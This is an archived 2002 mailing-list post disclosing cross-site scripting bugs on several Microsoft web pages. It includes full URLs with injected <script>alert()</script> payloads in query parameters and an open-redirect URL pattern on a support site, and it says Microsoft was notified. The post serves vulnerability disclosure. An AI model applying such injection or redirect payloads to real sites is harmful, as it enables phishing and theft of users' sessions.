('binary' encoding is not supported, stored as-is) I've already send this bug : http://www.microsoft.com/freedomtoinnovate/inc/send friend.asp?sAddress="><script>alert('Microsoft% 20hole')</script><"by%20frog-m@n There is 2 others cross scriptings bugs : http://www.microsoft.com/jobs/search/processCriteri a.asp?msid1=1047112&msid2=- 613922157&msid3=<script>alert('test') </script>&msid4=451143745 and in http://www.microsoft.com/jobs/search/keywords.asp . There is a bad redirect script too : http://support.microsoft.com/default.aspx? scid=http://where.to.go Crosoft has been alerted... frog-m@n
This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 07:58:57 PST